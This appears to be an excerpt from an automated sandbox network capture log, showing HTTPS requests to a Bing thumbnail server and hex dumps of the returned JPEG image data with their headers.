                                                                                                                                                                                                                                                                            2024-12-27 06:09:22 UTC16384INData Raw: 1a 8d cd 97 d9 ef 27 9b cb f3 64 92 28 a2 fb 9b eb 4a ce 5b 28 75 a8 af 2d ec 66 97 cd ff 00 55 ff 00 d9 ff 00 f1 15 9b f6 7b 27 d5 25 93 50 fb 6f db 2e a5 fd d7 d9 21 4f e2 ff 00 66 83 42 ff 00 85 de da 68 7c bd 43 5c fb 2d c5 d4 be 5c b2 f9 3b de 3a ec ef 3c 71 ab 78 33 4b 8b 47 b7 9e 1b ab 7f 2a 4b 68 ae bc ef 39 36 7f b1 17 f0 7d ff 00 e2 a6 68 76 3a 77 85 7c 3f e6 6a 10 7f a4 4b fe aa 2f be fb df fe 7a af f0 7b d7 0d e3 c5 91 f5 a8 bc cf f5 9e 57 ef 7f 82 b1 87 25 59 f9 17 cf ca 57 f0 ee bb 63 63 aa 4b 79 a9 68 87 5d 7f 2b fd 16 2b a9 9d 62 b7 ff 00 6b e4 ae b2 dd ed af 27 fb 47 87 e0 9b fb 42 fe 2f de da da 43 f3 db ee fb f1 c6 d5 4f e1 ff 00 87 2c 9e ca 5d 53 5c f2 7e c7 14 5f bd 8b ce 78 66 8f fb bb 3f da ad ed 1e e3 c3 16 d3 5a d9 e8 7a 1d 95 d6
                                                                                                                                                                                                                                                                            Data Ascii: 'd(J[(u-fU{'%Po.!OfBh|C\-\;:<qx3KG*Kh96}hv:w|?jK/z{W%YWccKyh]++bk'GB/CO,]S\~_xf?Zz
                                                                                                                                                                                                                                                                            2024-12-27 06:09:22 UTC16384INData Raw: fc 52 b1 a1 e9 de 2c d7 74 5b 0d 16 ee 39 f4 bf ec 7d 62 29 7c b8 a2 d3 e6 4f 26 4f f6 7f bd b6 8a f3 1b 3d 3e 4b fb 29 75 0d 43 5c b2 8a 38 bf e7 ac df be 93 fe 03 45 5d 1c 0d 38 a6 9c b5 03 d0 1f 5a b2 4b ef b6 78 b2 7d 4f 54 b3 8a fd 23 8a 58 a6 f2 5e 3d 89 fc 71 ca bf fc 4d 33 e2 67 87 34 5b bf 06 dd 78 8f 47 82 6d 32 df ca 8e e6 d6 d6 eb ef dc 6e fe 3f 95 b6 a7 fb 95 b1 ae f8 93 c7 1a bf 9b e1 bd 43 c1 17 96 b1 dd 44 fe 6f 9b a3 7e fa ef 6f fa ad df 2f f0 d5 0f 0f ea 52 78 4b 4d 96 cf 5c f0 ec d7 f1 fe f2 49 74 6f 3b fd 5a ff 00 d3 48 f6 b2 d7 97 17 38 4a 35 23 f1 76 4f 74 07 8c 6d 92 68 65 fb 47 fa bf f9 65 44 0b 1a c3 93 3f fa af f9 65 e4 d6 cf 8d 6f ec 9f 54 96 3d 22 ca 6b 5d 3f cd f3 3e cb 2f fc b0 97 f8 96 b1 a4 69 13 fd 67 ee a3 ff 00 9e 52 d7
                                                                                                                                                                                                                                                                            Data Ascii: R,t[9}b)|O&O=>K)uC\8E]8ZKx}OT#X^=qM3g4[xGm2n?CDo~o/RxKM\Ito;ZH8J5#vOtmheGeD?eoT="k]?>/igR


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            9192.168.2.649745150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC346OUTGET /th?id=OADD2.10239381795018_1H6ENBKGWI9ZKTUAB&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 963785
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: E2DEC6B8F8A740549FFF39E99BA97433 Ref B: EWR311000108021 Ref C: 2024-12-27T06:09:23Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:22 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1b c2 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 30 3a 34 32 3a 31 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 10:42:128
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC16384INData Raw: 11 bd f1 72 ca c3 4a f1 37 9d e7 7d b2 fb fd 5c 5e 56 f4 87 fe d9 a3 7d ca e6 b4 ab 18 ee f5 6b 2b 27 9b cb 92 4f f8 f9 fe 34 ff 00 ec 2b 52 c6 f2 d1 e6 93 4b ba f2 74 ff 00 b4 7f c7 cd ec 56 9f 69 bb df fd d5 ff 00 ec 6a d4 6d a6 e9 3e 18 92 fa 0b 3b 4b 79 e4 fd dd b7 db a5 77 9a 45 fe 29 76 7f 05 67 4e 52 a7 4d 53 77 6f 6b f7 11 d4 58 f8 7a 79 74 99 24 b2 d4 bc b8 3e 4f dd cb 2b c3 e6 22 ff 00 b3 5b da 6e bd fd 99 ab 7d b5 e1 8a 4f b1 7e f2 4f b3 6f ff 00 47 45 f9 56 b8 3b 1b ed 4a ca 5b 69 ef 6f 35 09 3f 79 e6 47 fd ff 00 f8 1a d7 73 a9 41 69 a9 c3 1f f6 44 30 c9 75 71 12 49 7b 1c bf f2 ee fb 2b c8 c6 53 6f 4a 8e e9 94 6e 79 ba ef 88 34 f8 f5 7b ed 4b cb b1 8f f7 97 31 cb 17 fa b7 fe 0f dd ff 00 c0 bf 8e b9 0f 88 7e 1b 82 1d 73 fb 45 fc 49 2e a3 05 c7
                                                                                                                                                                                                                                                                            Data Ascii: rJ7}\^V}k+'O4+RKtVijm>;KywE)vgNRMSwokXzyt$>O+"[n}O~OoGEV;J[io5?yGsAiD0uqI{+SoJny4{K1~sEI.
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC16384INData Raw: f3 47 07 d8 e2 f3 fc b4 f2 ff 00 75 b2 bb 2d 63 c4 7a 9a f8 7b 4d 7b ad 62 d3 51 92 39 3c cf dd 6f 77 81 57 fb ab 8c 22 d7 1e 65 81 55 a2 a1 ca bd ef 30 3d 9f c4 7e 25 f0 bd a4 36 c9 aa 4d 77 e7 49 6d ff 00 3c 9d d2 4f fc 77 6b e2 b2 35 2d 56 dd 21 bd 87 4e 86 5b 79 e3 8d 24 8e e6 38 b6 7f bb fe ca 32 ff 00 79 ab 8e f0 8e 87 1f 88 e6 8e 4b 5b 3b b8 ee a4 ff 00 59 24 7f e9 09 6f b7 e6 ff 00 79 3f e0 5f f8 f5 68 f8 f3 5a f1 0e 9f 15 b6 9c 9e 54 92 5e 47 ff 00 1f bf 6b d9 e6 37 fc f4 f2 ff 00 f6 5f eb 5f 31 4f 2e a5 4e a2 a3 4e 57 97 5b bb 7e 05 dc 96 eb c5 5f db 1a 7d cc 10 cd 69 1d f7 96 ff 00 bc b9 bb 7d 91 ff 00 b3 1e df 97 9a d6 f0 cd e4 7a 64 d1 de bc d3 5c 7d 8f 64 7f 62 d4 b6 79 df 3f c9 fb a7 4f 97 6d 45 e1 9b 9b 4b 28 a3 9a 6f b2 47 a8 fd 99 27 f2
                                                                                                                                                                                                                                                                            Data Ascii: Gu-cz{M{bQ9<owW"eU0=~%6MwIm<Owk5-V!N[y$82yK[;Y$oy?_hZT^Gk7__1O.NNW[~_}i}zd\}dby?OmEK(oG'
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: ba 6d be b9 25 d6 a9 0e 9f 71 63 27 fc 7c c7 f7 fc c8 be 4d d2 45 d3 ee b5 73 fe 0f f0 e5 a4 ba 1c 96 5a 74 df 6c d7 3e 79 23 8e e6 2d 8f 1c 5f 26 c8 bf ef af e2 fe 2a d6 b7 d7 20 8b c1 1f d9 7a dd 9f 99 05 97 fa 3d ed b4 bb 12 68 dd be 4f b4 43 f7 9a b9 2a 59 cb dc d6 da 7f c1 33 72 38 bf 17 49 71 69 ae 69 ba 5c 17 96 96 fe 64 9e 7d 95 ed 8d a6 c8 6e 11 bf 8b ee fe 9b 5a b3 75 8d 3b fb 3e ee c7 58 82 69 a4 fb 47 ef 24 f2 a2 47 4b 7b 8d ff 00 3c 7b d7 ee 7f 05 6e 78 9e cf fe 11 cd 3f fb 22 7b cf b4 47 65 23 c9 6d f6 6b 4f f9 75 93 e5 f3 1b e6 f9 58 d2 7c 3d 5d 16 ea 1b 97 b5 f3 a4 8e 48 fe d1 f6 28 ae df f7 77 11 be ed df 37 df 53 fe d5 7a 70 9f 2c 13 5a a0 39 ff 00 b4 fd af 4f d4 ad 67 bc ff 00 97 df 32 4f b3 4b bf f7 4d f3 36 ca e9 bc 33 e2 ad 4b c3 f0
                                                                                                                                                                                                                                                                            Data Ascii: m%qc'|MEsZtl>y#-_&* z=hOC*Y3r8Iqii\d}nZu;>XiG$GK{<{nx?"{Ge#mkOuX|=]H(w7Szp,Z9Og2OKM63K
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: b4 db 7f 14 47 e2 2f ed 2b 59 21 d3 e4 d1 ed ff 00 7f f6 2b 99 7e cf 35 c4 bf 77 cd 56 fe 06 fe fd 72 9e 12 96 7b 2b bf 23 54 9b 4f b8 8f ed 2f 69 f6 6b 99 7f 8f fb df ec 7f bf 5a ca 33 c4 73 7b 45 66 ad 65 bf 99 26 ce b1 73 7f 6f 69 1c 1a 8c 3e 5f 97 1b c7 e6 4b 2e cf bd fc 2b de ab e9 b7 da 96 b1 0c 7a 74 17 93 49 05 be f8 e3 92 5f f5 35 5f 76 93 71 0d cc f6 b0 fe f2 3f f5 51 cb 77 ff 00 1e ef fe cf f7 d6 b6 ac 74 1b ed 43 49 8f fb 52 f2 2d 2a eb cc ff 00 96 b1 79 36 d0 45 fe d7 fb 5f ee ad 6f 52 50 a7 0b b5 f7 80 6d 82 ee 1b 9b 5b 58 66 fe d5 93 64 16 57 b7 32 ba 7d 9e 25 ff 00 96 9f ec ff 00 c0 6a e7 82 ed bc 27 17 d8 be d5 79 fd ab 3c 9b e3 b8 fb 4c be 77 9f ff 00 5c 51 97 f7 78 ff 00 69 aa c7 88 16 3f 0d 6a 11 cd 06 a5 36 a3 25 bd b3 f9 9e 6f cf 0c
                                                                                                                                                                                                                                                                            Data Ascii: G/+Y!+~5wVr{+#TO/ikZ3s{Efe&soi>_K.+ztI_5_vq?QwtCIR-*y6E_oRPm[XfdW2}%j'y<Lw\Qxi?j6%o
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: af df 6f d9 57 fe 23 6a 12 6b ba 4d b5 96 97 79 f6 88 ed e2 7f dd c5 2f ef a3 45 fb 9b 9f f8 ff 00 e0 1f 2d 72 96 b6 d7 76 f6 96 da 24 fa 6c d2 5d 49 27 9f 1c 72 7c 9f ba 6f e3 56 ff 00 c7 69 d1 8a 92 e6 91 32 3b af 08 eb 93 bf 88 76 59 43 69 24 12 7e f2 3b 69 7e e4 9f de 77 df f7 de 9d f1 1a 7f 10 dc 78 b2 f6 d7 57 ff 00 51 25 ef 97 65 7b 1c ae 9f f8 ed 57 b1 f0 f4 f6 97 51 ce f3 7d a2 ea 4f dd fd 8a db f7 3e 42 2a 6d 76 93 7f df f9 78 ff 00 6a 9f f1 1b fb 26 2d 6e f7 57 b2 9a 19 27 bc 93 cb f2 e5 d8 e9 e6 ff 00 79 51 5b ff 00 1f 6a c3 96 9b ab ee 84 46 68 fa 56 b5 a3 ea 16 36 5a a6 9b 69 71 69 1f ef 24 fb e9 e7 fc fb 37 fc 8d 5d d6 b1 e1 9d 26 ef c3 d7 36 bf d8 33 5c 3c 7f ea e3 97 50 7d f3 fc ff 00 ea 5d 95 b0 9b 7f db ae 23 c3 f7 d1 ea 1a 7f f6 bd d5
                                                                                                                                                                                                                                                                            Data Ascii: oW#jkMy/E-rv$l]I'r|oVi2;vYCi$~;i~wxWQ%e{WQ}O>B*mvxj&-nW'yQ[jFhV6Ziqi$7]&63\<P}]#
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: 83 c7 b1 be a1 ff 00 14 f7 83 fc bf b4 46 f1 f9 9e 57 da 66 9f fd ed fe 67 dd ff 00 3b 6b 9a f0 74 57 77 5a 84 88 96 70 f9 9e 63 c7 24 7f 3c 3f 7b f8 7e 4f 9b 6f fb b5 d9 69 df 11 a4 b5 d7 2c bf b2 f4 78 b4 a9 3c b7 8e f6 3b 68 92 14 93 fb bf f8 ee ea b5 0e 9f 61 ae ea 37 d7 5e 10 9b 50 bc be f9 3e d3 a7 6a 5f 3b ef d9 f3 7e f3 f8 db fe 05 f3 57 4d 3a 8b 0e a5 7a 7c 89 ab de ed fd ef f2 fd 0a 32 fe 19 f8 7b 56 6d 43 56 49 e6 fb 14 91 ec 83 cc b9 8a 64 48 db f8 97 b9 d8 16 ab ee 44 d7 2e 74 eb 2f 26 f2 4f b4 bf ee e5 d9 fe b7 7f fc b3 db 5d 9e 9b 67 f6 ad 5b ec 5f 6c d4 2c af a3 b6 48 ee 7f 74 f0 a5 bc bb 3e 54 46 dd f2 7b ff 00 e8 35 8f 3f 84 ec 2e 2f 24 d6 ed 75 e8 b4 6b a9 37 c9 73 e6 c4 f3 43 bb 7f cd f3 63 e6 f9 ab 0f ad a7 56 4e a3 d1 a5 6d 3f 3b 09
                                                                                                                                                                                                                                                                            Data Ascii: FWfg;ktWwZpc$<?{~Ooi,x<;ha7^P>j_;~WM:z|2{VmCVIdHD.t/&O]g[_l,Ht>TF{5?./$uk7sCcVNm?;
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16069INData Raw: 7f c0 69 d3 c1 a6 e9 57 51 a3 c3 0f da a4 8f fe 5a 4b e7 25 bb ff 00 2a 8b c4 9a 7d 86 9f ab 59 41 6b 35 dd c7 ee ff 00 d2 7e d3 17 fa b7 ff 00 65 56 a7 82 28 16 1b 67 d4 7e d7 71 1f fc b3 8e 28 bf 82 ba 79 ae 93 6f 46 05 1b 48 b5 ad 62 ee 4b a9 ec f5 0b c8 ff 00 e9 da ad 69 be 09 d6 ae ae e3 81 ec ee ed fc cf f9 69 73 17 93 ff 00 b3 56 f2 6b 57 f6 f6 b1 d9 59 59 f9 70 49 fe ae 3f 93 7c 88 bf ed 7f 72 b6 63 82 7d 57 4f fb 2b d9 dd db cf 24 6f 25 b4 97 3f ea 63 6a c2 a5 79 c3 64 97 e2 07 3d 7d e1 7d 27 4f d4 64 d3 9f 58 f3 27 8e db cc 92 3b 18 b7 fc df dd df 5c 43 de 5d d8 cd 22 5a de 5d c7 1c 9f bb 93 cb f9 3c c4 ae b7 58 b3 d4 b4 78 77 ff 00 6c 79 9f 68 ff 00 59 24 5f fc 55 67 6a 90 58 5c 69 d1 bc 90 cb fe 8f fb b9 3e cd 17 fe 84 ed fc 96 b6 a5 36 ad cf
                                                                                                                                                                                                                                                                            Data Ascii: iWQZK%*}YAk5~eV(g~q(yoFHbKiisVkWYYpI?|rc}WO+$o%?cjyd=}}'OdX';\C]"Z]<XxwlyhY$_UgjX\i>6
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: 7f 77 35 ce 27 84 7c 60 fa 7e c7 d3 7c cf b3 db 79 1f eb 77 bc 9b bf d9 fe 0a e4 bc 37 ac 5d f8 6b 50 f3 d2 18 ae 13 fd 5d cd b5 cc 49 32 48 b5 b5 3c 15 19 59 c5 f3 38 ec b7 19 d8 ea be 3a f1 2c 33 6f b2 bc d4 2d fc cf 27 cc f3 7f e5 9f f0 ed dd 56 ef 9b c4 96 50 db 69 f7 bf 6b b2 ba 92 39 a4 f3 24 f9 e1 b8 f9 f6 ab fc bf af e7 55 de 28 25 f0 cd ed 96 9f 0c 37 97 5f 67 49 3c bf b8 9b 1b fb bf ee b2 d5 2f 07 78 c7 56 d1 26 8e d6 7b c9 a4 82 3d 91 c9 65 73 fe cf fb d9 db 55 ec 23 cb 7a 71 5a 09 dd 22 dc 9a 9e b3 a5 5a c7 a0 dc ea 51 49 75 7b b2 39 24 b6 8b e7 ff 00 be ff 00 8b fc 8a 65 86 83 e1 eb 49 bc 9b ab cb bf 32 f2 3f 2e 2f b3 4b e4 ff 00 c0 bf ef aa d6 f1 35 8f 86 b5 0d 12 e7 54 d3 ec a5 b3 82 4b 6f 33 ed b1 cb e7 3c 1b be 6d ac 9f f8 e5 62 68 f2 c7
                                                                                                                                                                                                                                                                            Data Ascii: w5'|`~|yw7]kP]I2H<Y8:,3o-'VPik9$U(%7_gI</xV&{=esU#zqZ"ZQIu{9$eI2?./K5TKo3<mbh
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: b1 7c f2 4b 1f fc b1 8d bf e5 9b ed fe 2a e2 be 3a 5c ff 00 6e e9 f6 3f e9 93 49 f7 e4 b6 8e 5d 89 e5 ee fe 0f f7 86 ca 82 fb c5 57 71 6a d1 da c1 0d dd 94 9a ac 93 49 25 b7 9a 93 7d df 92 35 5d df 77 e6 fe 1a de d3 a2 ff 00 84 97 c1 16 56 ba 87 9d a8 e9 51 ef 92 e6 db ca 7d ff 00 68 fe 16 8f cb fb 8b f7 da bd 8a 18 67 85 9c 6b 4f 6f 5d bf cc 77 d0 f1 3f 0f eb d7 1a 57 88 2d b5 7d 46 cf fe 59 bc 76 d2 4b 17 c9 fd df 97 77 15 d0 68 76 70 6a 1f 69 ba 4b 3f b4 49 71 b3 f7 71 6f f2 6e 37 3f dc f9 5a a9 fc 5b d3 24 fe d6 fe ce d1 21 9a 4d 2b 4a 8f cc 8e 3f 9f f8 be 66 f9 1f f5 ad 2f 84 2b 61 69 a4 c7 ab cd 34 b6 f3 c9 73 e5 db 79 52 bc 2f 69 2f f0 3a ff 00 0e d7 ef bb f0 af a1 ad 28 bc 3a af 15 ef 3b 69 f9 7a 08 ed 3c 09 e1 ed 32 d3 50 b9 d4 75 7f 15 69 ff 00
                                                                                                                                                                                                                                                                            Data Ascii: |K*:\n?I]WqjI%}5]wVQ}hgkOo]w?W-}FYvKwhvpjiK?Iqqon7?Z[$!M+J?f/+ai4syR/i/:(:;iz<2Pui


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            10192.168.2.649746150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC346OUTGET /th?id=OADD2.10239360172384_1T8ZHTG4V2CH7K983&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 482575
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: E3FF3C1B66A74F9A98D31FA38651F44C Ref B: EWR30EDGE1119 Ref C: 2024-12-27T06:09:23Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:22 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 34 34 3a 34 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                            Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:44:418C
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC16384INData Raw: 6d a9 76 d1 8c d1 71 f2 91 ed c5 0a b5 2e dc d3 b6 52 bd 87 ca c8 36 51 b6 a5 d9 9e 69 76 d1 7b 07 29 12 ad 1b 6a 6d b4 8c b4 68 1c ac 87 6d 2a ad 4a ab 46 ca 34 0e 52 26 5c 52 2a d4 db 7f ef aa 36 50 1c a4 58 f6 a4 c6 5a a7 65 f9 69 bb 3b d1 74 3b 11 e3 da 8d a0 d4 db 68 d9 45 d0 58 83 6e 29 ca 95 2e da 4d b4 0f 95 11 6d a3 6e 2a 65 4c d1 b3 be 29 5d 07 29 16 de f4 6d a9 76 d2 aa 66 8b a0 e5 20 d9 4a ab 52 ed a3 6d 17 05 12 2c 7a 51 b6 a5 db 4b b7 34 5c 39 48 76 d2 ed a9 15 7e 6a 5d b4 73 0f 94 8b 6d 1b 6a 5d b4 aa 94 73 07 29 12 8a 5c 7b 54 bb 45 0c a2 93 63 22 d9 9a 36 54 aa 9f 2f 5a 15 28 e6 0e 52 2d 94 32 d4 cc 94 d6 42 28 e6 17 29 16 ca 2a 7d 9d f3 45 1c cc 39 4e 4d 47 6a 5c 7c b5 36 c6 34 2a fa 57 5d cf 3b 95 91 2a e2 95 52 a5 d9 8a 55 5c 52 1f 29
                                                                                                                                                                                                                                                                            Data Ascii: mvq.R6Qiv{)jmhm*JF4R&\R*6PXZei;t;hEXn).Mmn*eL)])mvf JRm,zQK4\9Hv~j]smj]s)\{TEc"6T/Z(R-2B()*}E9NMGj\|64*W];*RU\R)
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC16384INData Raw: 3b ab 58 84 6d fb e8 95 92 79 24 b6 fa 64 ff 00 b1 9f 6a 9d b5 a8 21 b6 96 e6 49 db ec f1 44 46 d5 5f 9d 87 18 6c f5 ac e4 db 7a 9b 46 31 4b 63 4e 31 29 b8 f3 3c c8 d0 b6 37 ed fa e7 8a b2 d3 19 76 b9 66 59 17 8d bb be 56 ae 62 1f 10 d8 48 aa 2c 16 59 cd c2 06 96 58 d4 a2 c7 cf f0 ee ea c7 a5 5c 93 58 86 35 93 6f cb e5 f1 13 33 02 d9 6e a7 1e a3 b5 4e bd 47 ee b5 74 74 3f 30 8b 3f 78 ff 00 7b 77 14 d7 98 88 d6 32 cc 83 fb fb bf cf 15 cd 4d e2 0b 73 71 6d 19 95 55 6e 24 c3 6e 5f f5 80 77 3d be 9e a6 a1 b9 f1 1d 94 b6 bf e8 f7 2b 0d ba f2 b2 37 ca 30 0e 3a 9f 53 54 9b ec 2b 47 ab 3a 77 99 da 4f 30 ed da bc 32 ee cf eb da a2 79 24 32 32 bf fa be 3c b6 fe a6 b9 77 f1 6e 97 a7 5d 79 ed 15 cf d9 99 18 4b 3f df 56 2b df 68 e8 0d 5d 6f 12 d8 4f 34 48 96 d2 4f d1
                                                                                                                                                                                                                                                                            Data Ascii: ;Xmy$dj!IDF_lzF1KcN1)<7vfYVbH,YX\X5o3nNGtt?0?x{w2MsqmUn$n_w=+70:ST+G:wO02y$22<wn]yK?V+h]oO4HO
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: 5e 69 f6 8b 27 99 75 17 99 f3 79 73 33 48 9f 2b b7 20 37 f7 7e 95 90 da 65 b3 5c 35 99 be 83 ce 65 3e 5c 5b 46 ee 3a 8f f3 d2 ba 69 72 c6 36 47 15 68 ce 52 bb 67 1b 26 f1 23 11 f3 1d c7 fd 6b 6e 1f d7 a0 ed e9 44 d7 11 c5 1b 34 70 33 47 e6 7c db 7e 56 6f 4c 7f 8d 6c 5c f8 7a 29 b5 29 c4 77 31 b1 b6 65 f3 e2 58 ca b4 7b ba 0c 8e 84 d5 67 d1 d2 2d 42 4b 4f 97 74 4c 43 2f de 6c 8e 78 c1 ec 2b 67 63 9f 96 44 36 f7 72 41 1c 72 a7 da d6 29 72 5a 39 3e 65 cf 7f 7d de 86 ab dc 6a 66 76 54 1b a3 56 5f bb 1a 85 f3 38 e0 55 8d 4b 4e 8a 4b 78 e4 fb 64 6c 56 43 1c 9b 5b e6 5f 4a a6 9a 12 43 37 9a 62 dc 19 88 8d bf 8b 20 ff 00 7b 3d 6b 0e 55 ab 35 72 9e c4 96 d7 6e 97 1e 62 2b 37 98 a0 6c 5f f9 66 31 8e 3d fe b5 7b 42 96 e5 ae bc ab 99 6e 6d a3 8f ef 49 b8 7c c0 72 7a
                                                                                                                                                                                                                                                                            Data Ascii: ^i'uys3H+ 7~e\5e>\[F:ir6GhRg&#knD4p3G|~VoLl\z))w1eX{g-BKOtLC/lx+gcD6rAr)rZ9>e}jfvTV_8UKNKxdlVC[_JC7b {=kU5rnb+7l_f1={BnmI|rz
